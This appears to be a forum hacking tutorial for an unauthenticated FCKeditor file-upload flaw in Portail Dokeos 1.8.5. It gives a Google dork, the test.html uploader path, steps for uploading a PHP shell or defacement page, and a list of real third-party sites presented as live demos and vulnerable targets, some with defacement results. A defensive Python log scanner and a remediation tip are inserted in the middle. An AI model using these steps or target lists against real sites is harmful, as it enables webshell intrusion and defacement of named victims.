Portail Dokeos 1.8.5 ships FCKeditor with its file-manager upload test page (test.html) still in place, and the upload connector behind it is reachable without logging in. Through this remote file upload an attacker can drop a shell or a defacement page on the site, and then open the uploaded file directly, all without the admin username and password. (test.html is a test harness that FCKeditor bundles with its uploader; it is meant to be deleted, and the connector disabled, before the editor is deployed.) Okay, straight to the tutorial.
Google Dork:
"Portail Dokeos 1.8.5"
Exploit:
http://[target]/[path]/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
([path] is the directory Dokeos is installed in; it is empty when Dokeos sits at the web root, and /staff in the first live demo below.)
Once you have found a vulnerable site via Google, follow these steps:
- Go to: http://[target]/[path]/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- In the page's language dropdown, change ASP to PHP, then click Browse, pick the file you want to upload, and click Upload. You can upload files with the extensions PHP, HTML, JPG and TXT.
- To view the uploaded file, go to: http://[target]/[path]/main/upload/<your file>
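For the defender's side of the same procedure, here is an added example (not part of the original post and not Dokeos's or FCKeditor's own code): a Python script that scans web server access logs for the three steps above, a request for the uploader's test.html, a POST to the upload connector in that directory, and a later successful fetch of a .php or .html file from /main/upload/. The combined log format, the client IPs, the file names and the connector filename php/upload.php in the sample lines are constructed assumptions; the rules key on the directory, not the connector name, so they do not depend on the exact FCKeditor version.

```python
"""Flag FCKeditor file-manager abuse in web server access logs (added example)."""
import re
from collections import defaultdict

# Paths from the tutorial: the unauthenticated uploader test page/connector
# directory and the directory Dokeos serves uploaded files from.  Both are
# relative to the Dokeos install path, so we match on the path suffix.
FCK_UPLOAD_DIR = "/main/inc/lib/fckeditor/editor/filemanager/upload/"
RESULT_DIR = "/main/upload/"
# Of the extensions the uploader accepts (php, html, jpg, txt), these are the
# ones that yield code execution or a defacement page.
DANGEROUS_EXT = (".php", ".html", ".htm")

# Assumption: the server logs in Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one full attack chain from 203.0.113.7 and benign
# traffic from 198.51.100.3.  The connector filename is an assumption.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2009:10:01:02 +0000] "GET /main/inc/lib/fckeditor/editor/filemanager/upload/test.html HTTP/1.1" 200 2310
203.0.113.7 - - [12/Mar/2009:10:01:40 +0000] "POST /main/inc/lib/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2009:10:02:05 +0000] "GET /main/upload/deface.html HTTP/1.1" 200 1450
198.51.100.3 - - [12/Mar/2009:10:05:00 +0000] "GET /main/upload/logo.jpg HTTP/1.1" 200 8100
198.51.100.3 - - [12/Mar/2009:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 3000
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    # Drop the query string and normalise case so suffix checks are reliable.
    entry["path"] = entry["path"].split("?", 1)[0].lower()
    return entry


def classify(entry):
    """Return the list of finding tags for one parsed log entry."""
    findings = []
    path, method, status = entry["path"], entry["method"], entry["status"]
    if FCK_UPLOAD_DIR in path:
        if path.endswith("/test.html"):
            findings.append("fckeditor-test-page")    # recon: the upload form was opened
        elif method == "POST":
            findings.append("fckeditor-upload-post")  # the upload itself hit the connector
    if RESULT_DIR in path and path.endswith(DANGEROUS_EXT) and status == "200":
        findings.append("executable-upload-served")   # an uploaded .php/.html was served
    return findings


def scan(lines):
    """Group findings by client IP as (timestamp, tag, path) tuples."""
    by_ip = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for tag in classify(entry):
            by_ip[entry["ip"]].append((entry["ts"], tag, entry["path"]))
    return dict(by_ip)


def full_chain_ips(report):
    """IPs that performed all three steps: recon, upload, and fetch of the result."""
    needed = {"fckeditor-test-page", "fckeditor-upload-post", "executable-upload-served"}
    return sorted(ip for ip, hits in report.items() if needed <= {tag for _, tag, _ in hits})


if __name__ == "__main__":
    report = scan(SAMPLE_LOG.splitlines())
    for ip, hits in report.items():
        for ts, tag, path in hits:
            print(f"{ip} {ts} {tag} {path}")
    print("full chain:", full_chain_ips(report))
```

Any hit on the test page alone is worth an alert, since a deployed Dokeos has no legitimate reason to serve it. The fix on the server is to delete test.html and disable the PHP upload connector (FCKeditor's config.php has `$Config['Enabled']` for this); the log rule then still catches the probes.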
Live Demo: http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Result: http://www.blowupwebshow.com/staff/main/upload/r14nul.html
Live Demo: http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Result: http://www.rottapro.net/main/upload/r14nul.html
Live Demo: http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Result: http://www.dokeos.nrc-gauthey.fr/main/upload/r14nul.html
Other sites that have the vulnerability:
- http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
That's all for now, friends :D (sorry the tutorial is rough), hope it's useful :D